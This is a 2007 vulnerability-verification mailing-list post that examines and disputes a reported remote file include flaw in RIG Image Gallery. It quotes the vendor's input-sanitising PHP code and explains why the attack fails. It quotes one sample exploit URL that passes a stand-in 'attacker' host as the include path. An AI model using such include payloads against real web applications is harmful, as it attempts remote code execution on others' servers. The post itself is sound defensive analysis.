[VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability
George A. Theall
theall at tenablesecurity.com
Tue Jul 31 02:06:16 UTC 2007
Another advisory from ilker Kandemir:
http://archives.neohapsis.com/archives/bugtraq/2007-07/0365.html
Sample exploit:
check_entry.php?dir_abs_src=http://attacker.php?
Actual code from 2006-06-24_v10:
---- snip, snip, snip ----
function rig_check_src_file($name)
{
...
// disable auto-globals from CGI params -- RM 20060624 - v1.0
ini_set("register_globals", "0");
// complain if that didn't work
if (ini_get("register_globals") == 1)
{
echo "<h1>RIG Security Error</h1>";
...
exit;
}
...
$name = str_replace("..", ".", str_replace("://", "", $name));
...
return $name;
}
...
require_once(rig_check_src_file($dir_abs_src . "entry_point.php"));
---- snip, snip, snip ----
By the way, there is no executable PHP code before the function definition.
I don't think any version of PHP allows for changing register_globals
via ini_set() -- see <http://us3.php.net/manual/en/ini.php#ini.list> --
which is probably why the author checks whether it is set and exits if
so. But regardless, the str_replace() later on in rig_check_src_file()
would certainly void the possibility of a remote file include attack.
George
--
theall at tenablesecurity.com
More information about the VIM
mailing list